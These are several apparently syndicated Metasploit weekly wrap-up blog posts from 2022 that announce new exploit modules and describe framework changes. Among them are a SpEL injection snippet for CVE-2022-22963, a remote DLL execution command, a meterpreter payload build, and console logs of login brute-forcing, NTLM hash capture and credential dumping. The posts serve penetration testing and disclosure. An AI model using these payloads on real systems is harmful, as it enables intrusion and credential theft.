[*]       * daforest-WIN-BR0CCBA815B-CA
[*]          Server: WIN-BR0CCBA815B.daforest.com
[*]          Enrollment SIDs:
[*]             * S-1-5-11 (Authenticated Users)
… etc etc …

SSL Scanner improvements

Community member h00die has made improvements to a new Metasploit’s SSL scanner modules, and combined the functionality of two existing modules auxiliary/scanner/http/ssl.rb auxiliary/scanner/http/ssl_version.rb into one new module auxiliary/scanner/ssl/ssl_version.rb. This new module has added checks for Deprecated protocols, expired/not valid certs, low key strength, Null cipher suites, certificates signed with MD5, DROWN, RC4 ciphers, exportable ciphers, LOGJAM, and BEAST.

Reduced Python payload sizes

Community member llamasoft has recently contributed improvements to our Python payloads, with the first change being a modification to the Python Meterpreter stage to calculate the necessary data for AES encryption at runtime – which helped reduce the stage size by about 6,000 bytes. This week’s Metasploit release includes compression support using zlib. This change reduces the size of the Python Meterpreter from 95kb to 24kb.

New module content (4)

• Misconfigured Certificate Template Finder by Grant Willcox – This adds a module that analyzes certificate templates to identify ones that are vulnerable to ESC1, ESC2 and ESC3. When a template is found to be vulnerable, the necessary information is printed for the user including the template name, the issuing CAs and the SIDs of the users that are able to issue them.
• SSL/TLS Version Detection by todb, Chris John Riley, Veit Hailperin, et, and h00die, which detects CVE-2022-3358 – A new module modules/auxiliary/scanner/ssl/ssl_version.rb has been released which replaces the old SSL scanners and offers improved features such as SSL cipher suite checking, improvements to CA Issuers logic, support for expired certs and depreciated protocols, and better error handling.
• Reverse Lookup IP Addresses by mubix and bcoles – Adds a new post/multi/recon/reverse_lookup module that reverse resolves an IP address or IP address range to hostnames. The old post/windows/gather/reverse_lookup and post/windows/recon/resolve_ip modules have been removed.
• Windows Gather Navicat Passwords by HyperSine and Kali-Team – This adds a post module that retrieves and decrypts passwords saved by Navicat.

Enhancements and features (6)

• #17211 from llamasoft – This compresses Python payloads using zlib to make them smaller.
• #17219 from jheysel-r7 – Update Zabbix login_scanner to work with version 6.2.4.
• #17223 from cgranleese-r7 – The reload_lib functionality has been updated so that its file change tracking logic better takes into account scenarios where files are modified. Previously if a breakpoint was inserted, removed, and then reload_lib -a was run, it would mistakenly use an old copy of the code.
• #17234 from cgranleese-r7 – Add references to info -d command in the options and info command outputs. This command allows you to generate a HTML document which you can use to view the full documentation of a module in your browser.
• #17235 from jmartin-r7 – Updates auxiliary/scanner/http/manageengine_desktop_central_login module to report the service name correctly as http or https.
• #17238 from zeroSteiner and NtAlexio2 – Adds the shutdown command to Window’s Python Meterpreter.

Bugs fixed (3)

• #17177 from nzdjb – A bug has been fixed when searching for or attempting to use modules whereby trailing :‘s were not handled appropriately as part of the input, and could lead to all modules in Metasploit being returned.
• #17221 from adfoster-r7 -A bug has been fixed that would cause crashes when generating payload sizes. Additionally, the code has been updated to ignore payload metadata for adaptor payloads when determining payload sizes.
• #17244 from zeroSteiner – A bug that could cause the hostname command to fail in Mettle versions of Meterpreter has been improved by adding increased validation to the hostname code.
• #17220 from adfoster-r7 – This fixes a crash in the peinject stage that would occur when the PE datastore option was not set.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.2.25…6.2.26
• Full diff 6.2.25…6.2.26

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/08/19/metasploit-wrap-up-172/

Advantech iView NetworkServlet Command Injection

This week Shelby Pace has developed a new exploit module for CVE-2022-2143. This module uses an unauthenticated command injection vulnerability to gain remote code execution against vulnerable versions of Advantech iView software below 5.7.04.6469. The software runs as NT AUTHORITY\SYSTEM, granting the module user unauthenticated privileged access with relatively low effort. Version 5.7.04.6469 has been patched to require authentication, but remote code execution can still be achieved – gaining a shell as the LOCAL SERVICE user.

Cisco ASA ASDM Brute-force Login

Our very own Jake Baines has contributed a new module which scans for the Cisco ASA ASDM landing page and performs login brute-force to identify valid credentials:

msf6 > use auxiliary/scanner/http/cisco_asa_asdm_bruteforce
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set RHOST 10.9.49.201
RHOST => 10.9.49.201
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set VERBOSE false
VERBOSE => false
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > run
[*] The remote target appears to host Cisco ASA ASDM. The module will continue.
[*] Starting login brute force...
[+] SUCCESSFUL LOGIN - "cisco":"cisco123"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > 

New module content (2)

• Cisco ASA ASDM Brute-force Login by jbaines-r7 – This adds a scanner module to brute force the Cisco ASA’s ASDM interface in its default configuration.
• Advantech iView NetworkServlet Command Injection by Shelby Pace, rgod, and y4er, which exploits CVE-2022-2143 – This adds an exploit module that leverages a command injection vulnerability in Advantech iView (CVE-2022-2143) to get remote command execution as the SYSTEM user. Versions below 5.7.04.6469 are vulnerable and do not require authentication. Version 5.7.04.6469 is still vulnerable but requires valid credentials to be exploited. Also, this version only gets you RCE as the LOCAL SERVICE user.

Enhancements and features (7)

• #16883 from gwillcox-r7 -This PR deprecates the srt_webdrive_priv script as the same functionality is included in the service_permissions post module.
• #16884 from bcoles – This PR deprecates the credcollect script as it has effectively been replaced by post/windows/gather/credentials/credential_collector
• #16902 from bcoles – The scripts/meterpreter/killav.rb script has been removed since scripts have been depreciated for over 5 years. It has been replaced with post/windows/manage/killav.
• #16905 from bcoles – The scripts/meterpreter/panda_2007_pavsrv51.rb script has been removed and replaced by exploit/windows/local/service_permissions. Note that scripts have been deprecated for over 5 years and are no longer supported.
• #16908 from bcoles – Remove ./scripts/meterpreter/dumplinks.rb, replace with post/windows/gather/dumplink which does pretty much the same thing but is a proper module vs a deprecated script, since we stopped supporting scripts several years ago.
• #16909 from bcoles – scripts/meterpreter/get_pidgin_creds.rb has been removed since scripts have been depreciated for some time now and are no longer supported. It has been replaced by post/multi/gather/pidgin_cred.
• #16910 from bcoles – The scripts/meterpreter/arp_scanner.rb script has been replaced with post/windows/gather/arp_scanner which implements the same logic with an improved OUI database to help fingerprint the MAC vendor.

Bugs fixed (1)

• #16881 from bcoles – This fixes a crash in the post/windows/manage/forward_pageant module caused by the removal of Dir::Tmpname.make_tmpname() in Ruby 2.5.0. This also makes some improvements to the code.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.2.12…6.2.13
• Full diff 6.2.12…6.2.13

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/05/27/metasploit-weekly-wrap-up-158-2/

PetitPotam Improvements

Metasploit’s Ruby support has been updated to allow anonymous authentication to SMB servers. This is notably useful while exploiting the PetitPotam vulnerability with Metasploit, which can be used to coerce a Domain Controller to send an authentication attempt over SMB to other machines via MS-EFSRPC methods:

msf6 auxiliary(scanner/dcerpc/petitpotam) > run 192.168.159.10

[*] 192.168.159.10:445    - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw

[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.159.10
[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:768ec6a80487d57b:c5bae280991f0814f92bbbd5cce710df:0101000000000000806cc79fb364d801fed140b07186c36f000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f005500500007000800806cc79fb364d80106000400020000000800300030000000000000000000000000400000ee85f088ff3d462c936ca209ddc2cc835a9df7261cf96264158f81bf31035a980a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100350039002e003100320038000000000000000000

[+] 192.168.159.10:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >

Full details can be found in the Metasploit PetitPotam documentation.

Standalone SMB Server tool

Our very own Spencer McIntyre has added support for creating a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB 1/2/3, as well as encryption support for SMB3.

Example usage:

ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point .

This can be useful for copying files onto remote targets, or running remote DLLs:

copy \\192.168.123.1\home\example.txt .

rundll32.exe \\192.168.123.1\home\example.dll,0

Local Exploit suggester improvements

The post/multi/recon/local_exploit_suggester module is a post-exploitation module which iterates through multiple relevant Metasploit modules and automatically checks for local vulnerabilities that may lead to privilege escalation.

This module has been updated with a number of bug fixes, as well as having the UX has been improved to more clearly highlight which modules are viable:

msf6 post(multi/recon/local_exploit_suggester) > run session=-1
... etc ...
[*] ::1 - Valid modules for session 3:
============================
 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                 Yes                      The target is vulnerable.
 2   exploit/linux/local/cve_2022_0847_dirtypipe                         Yes                      The target appears to be vulnerable. Linux kernel version found: 5.14.0
 3   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/desktop_privilege_escalation                    Yes                      The target is vulnerable.
 5   exploit/linux/local/network_manager_vpnc_username_priv_esc          Yes                      The service is running, but could not be validated.
 6   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 7   exploit/linux/local/polkit_dbus_auth_bypass                         Yes                      The service is running, but could not be validated. Detected polkit framework version 0.105.
 8   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 9   exploit/android/local/futex_requeue                                 No                       The check raised an exception.
 10  exploit/linux/local/abrt_raceabrt_priv_esc                          No                       The target is not exploitable.
 11  exploit/linux/local/abrt_sosreport_priv_esc                         No                       The target is not exploitable.
 12  exploit/linux/local/af_packet_chocobo_root_priv_esc                 No                       The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable
 13  exploit/linux/local/af_packet_packet_set_ring_priv_esc              No                       The target is not exploitable.
 14  exploit/linux/local/apport_abrt_chroot_priv_esc                     No                       The target is not exploitable.
 15  exploit/linux/local/asan_suid_executable_priv_esc                   No                       The check raised an exception.
 16  exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc          No                       The target is not exploitable.

Setting the option verbose=true will now also highlight modules that weren’t considered as part of the module suggestion phase – due to session platform/arch/type mismatches. This is useful for evaluating modules which may require manually migrating from a Shell session to Meterpreter, or from a Python Meterpreter to a Native Meterpreter to gain local privilege escalation etc.

New module content (1)

• #16488 from cdelafuente-r7 – This updates the exploit/windows/local/vss_persistence and post/windows/manage/persistence_exe modules to optionally obfuscate scheduled tasks. Additionally, the post/windows/manage/persistence_exe was updated with a new "TASK" startup technique that allows users to obtain persistence via a scheduled task.

Enhancements and features (7)

• #16413 from sjanusz-r7 – Updates the multi/recon/local_exploit_suggester with multiple enhancements, including the ability to correctly work with Java/Python Meterpreters as well as now generating a readable table of results.
• #16481 from zeroSteiner – This updates the Msf::Exploit::Remote::SMB::Server::Share mixin to use RubySMB, which now supports SMB versions 1-3, along with various other features like accounting, state logging, session tracking, support for multiple files etc. All existing modules that were using this mixin will now automatically benefit from these improvements. They will work again against modern versions of Windows where SMBv1 has been disabled.
• #16518 from adfoster-r7 – Merge Metasploit framework wiki into Metasploit framework.
• #16600 from adfoster-r7 – Update docs site to use migrated wiki files.
• #16610 from zeroSteiner – Updates the module windows/dcerpc/cve_2021_1675_printnightmare from being an auxiliary that would require the user to setup and configure an external Samba share to host the payload to an all-inclusive exploit. This means users can deliver their payloads in a seamless fashion without needing to deal with Samba.
• #16620 from zeroSteiner – Adds a standalone tool for creating a read-only SMB 2/3 server from the current working directory. Usage: ruby ./tools/smb_file_server.rb. Normal SMB clients can then connect to this share and download files as normal. For instance via Windows with copy \\192.168.123.1\home\example.exe . or net use \\192.168.123.1\home /u:WORKGROUP\metasploit password

Bugs fixed (1)

• #16619 from NikitaKovaljov – This fixes a bug in neighbor advertisement filtering as used by the auxiliary/scanner/discover/ipv6_neighbor module. Prior to this patch, the module would fail to map IPv4 to IPv6 addresses.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.43…6.2.0
• Full diff 6.1.43…6.2.0

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/05/06/metasploit-wrap-up-154/

VMware Workspace ONE Access RCE

Community contributor wvu has developed a new Metasploit Module which exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the ‘horizon’ user. This module has a CVSSv3 base score of 9.8, and a full technical analysis can be found on the official Rapid7 Analysis

WSO2 Arbitrary File Upload to RCE

Our very own Jack Hysel has contributed a new module for CVE-2022-29464. Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a java/meterpreter/reverse_tcp payload inside a WAR file and uploads it to the target via the vulnerable file upload. It then executes the payload to open a session. A full technical analysis can be found on the official Rapid7 Analysis

Kiwi Meterpreter Updates – Windows 11 Support

The Meterpreter Kiwi extension has been updated to pull in the latest changes from the upstream mimikatz project. Notably this adds support for Windows 11 when running the creds_all command within a Meterpreter console:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi…
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
meterpreter > sysinfo
Computer        : WIN11-TEST
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : TESTINGDOMAIN
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain         NTLM                           SHA1
--------     ------         ----                           ----
WIN11-TEST$  TESTINGDOMAIN  a133becebb8e22321dbf26bf8d90f398  dbf0ad587f62004306f435903fb3a516da6ba104
... etc etc ...

New module content (3)

• VMware Workspace ONE Access CVE-2022-22954 by wvu, Udhaya Prakash, and mr_me, which exploits CVE-2022-22954 – This adds an exploit for CVE-2022-22954 which is an unauthenticated RCE in VMWare Workspace ONE Access.
• WSO2 Arbitrary File Upload to RCE by wvu, Jack Heysel, Orange Tsai, and hakivvi, which exploits CVE-2022-29464 – This adds an exploit for CVE-2022-29464 which is an arbitrary file upload vulnerability in multiple WSO2 products that can be used to obtain remote code execution.
• ZoneMinder Language Settings Remote Code Execution by krastanoel, which exploits CVE-2022-29806 – This leverages a directory traversal and arbitrary file write in vulnerable versions of ZoneMinder to achieve remote code execution as the www-data user.

Enhancements and features (2)

• #16445 from dwelch-r7 – The Windows Meterpreter payload now supports a MeterpreterDebugLogging datastore option for logging debug information to a file. Example usage:

use windows/x64/meterpreter_reverse_tcp
set MeterpreterDebugBuild true
set MeterpreterDebugLogging rpath:C:/test/foo.txt
save
generate -f exe -o shell.exe
to_handler

• #16462 from bcoles – Adds support for armle/aarch64 architectures to gdb_server_exec

Bugs fixed (2)

• #16526 from jheysel-r7 – The version of Meterpreter Payloads has been upgraded to pull in a fix that will ensure that the Kiwi extension can now work properly on Windows 11 hosts and correctly dump credentials vs failing silently as it was doing previously.
• #16530 from sjanusz-r7 – This updates the pihole_remove_commands_lpe module to no longer break sessions when running the check method.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.40…6.1.41
• Full diff 6.1.40…6.1.41

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/04/01/metasploit-weekly-wrap-up-155/

CVE-2022-22963 – Spring Cloud Function SpEL RCE

A new exploit/multi/http/spring_cloud_function_spel_injection module has been developed by our very own Spencer McIntyre which targets Spring Cloud Function versions Prior to 3.1.7 and 3.2.3. This module is unrelated to Spring4Shell CVE-2022-22965, which is a separate vulnerability in the WebDataBinder component of Spring Framework.

This exploit works by crafting an unauthenticated HTTP request to the target application. When the spring.cloud.function.routing-expression HTTP header is received by the server it will evaluate the user provided SpEL (Spring Expression Language) query, leading to remote code execution. This can be seen within the CVE-2022-22963 Metasploit module:

res = send_request_cgi(
    'method' => 'POST',
    'uri' => normalize_uri(datastore['TARGETURI']),
    'headers' => {
    'spring.cloud.function.routing-expression' => "T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub("'", "''")}'})"
    }
)

Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message

New module content (1)

• Spring Cloud Function SpEL Injection by Spencer McIntyre, hktalent, and m09u3r, which exploits CVE-2022-22963 – This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to 3.1.7 and 3.2.3.

Bugs fixed (2)

• #16364 from zeroSteiner – This adds a fix for a crash in auxiliary/spoof/dns/native_spoofer and adds documentation for the module.
• #16386 from adfoster-r7 – Fixes a crash when running the exploit/multi/misc/java_rmi_server module against at target server, such as Metasploitable2

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.35…6.1.36
• Full diff 6.1.35…6.1.36

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/03/18/metasploit-weekly-wrap-up-153/

CVE-2022-21999 – SpoolFool

Our very own Shelby Pace has added a new module for the CVE-2022-21999 SpoolFool privilege escalation vulnerability. This escalation vulnerability can be leveraged to achieve code execution as SYSTEM. This new module has successfully been tested on Windows 10 (10.0 Build 19044) and Windows Server 2019 v1809 (Build 17763.1577).

CVE-2021-4191 – Gitlab GraphQL API User Enumeration

Jake Baines has contributed a new module for CVE-2021-4191, which queries the GitLab GraphQL API to acquire the list of GitLab users without authentication. There’s some news coverage from earlier this month here. The module works on all GitLab versions from 13.0 up to 14.8.2, 14.7.4, and 14.6.5.

Adapted Payloads

Spencer McIntyre has added a new payload type that allows existing modules to be adapted for new scenarios. For example, modern exploits often deliver OS command payloads while Metasploit users would prefer to have more fully-featured native payloads (like Meterpreter delivered) and these scenarios are often special cases handled by the module author. Metasploit’s new payload adapters allow payloads from one architecture to be converted to another for seamless compatibility with a wider variety of exploit modules. The first entry for this new type is an adapter that converts Python payloads to OS command payloads, allowing any exploit capable of executing a Unix Command payload to deliver a Python Metepreter in memory. For additional ease of use, the correct Python binary is automatically determined.

New module content (3)

• Windows IIS HTTP Protocol Stack DOS by Axel Souchet, Maurice LAMBERT, Max, and Stefan Blair, which exploits CVE-2021-31166 – A new module has been added that exploits CVE-2021-31166, a UAF bug in http.sys when parsing Accept-Encoding headers, to cause a BSoD and denial of service on vulnerable IIS servers.
• GitLab GraphQL API User Enumeration by jbaines-r7 and mungsul, which exploits CVE-2021-4191 – This adds an auxiliary module that enumerates Gitlab user accounts via the GraphQL API which does not require authentication when querying user information.
• CVE-2022-21999 SpoolFool Privesc by Oliver Lyak and Shelby Pace, which exploits CVE-2022-21999 – This adds a module targeting SpoolFool (AKA CVE-2022-21999), a local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.

Enhancements and features (2)

• #16186 from zeroSteiner – This adds an additional Adapter payload type which can be used in a scenario such as wanting to deliver a full Meterpreter session from a command payload.
• #16262 from zeroSteiner – This updates the default payload selection so that cmd/unix/reverse_bash is chosen over cmd/unix/reverse_netcat by default unless RequiredCmd is set such that the module cannot execute Bash payloads.

Bugs fixed (7)

• #16316 from smashery – This ensures individual modules no longer accidentally shut down joint services that are used across multiple modules/handlers etc, such as HTTP servers. Modules will now correctly unregister interest in the global service, and if there are no longer any interested modules in the running global service, it will be shut down correctly.
• #16324 from smashery – This fixes an issue in the DNS native server module where the server would crash upon receiving a query.
• #16326 from zeroSteiner – This fixes SMB signing detection for the scanner/smb/smb_version module when the target server has SMB1 disabled.
• #16332 from bcoles – This change fixes a bug in APK injection where the native libraries would not automatically be aligned with zipalign, and would fail to install on a device.
• #16334 from bcoles – This change fixes a bug where APK files that were not signed with the v1 scheme would fail during the signing phase of APK file injection with msfvenom.
• #16347 from zeroSteiner – This updates the normalize_host method so that when it attempts and fails to resolve a hostname to an IP address, it will return nil instead of raising an exception. Previously this exception would result in modules like auxiliary/gather/enum_dns crashing instead of saving the information it had managed to gather on the target so far.
• #16350 from sjanusz-r7 – This fixes an unintentional crash when using payload/windows/x64/encrypted_shell_reverse_tcp without having a database configured

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.33…6.1.34
• Full diff 6.1.33…6.1.34

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).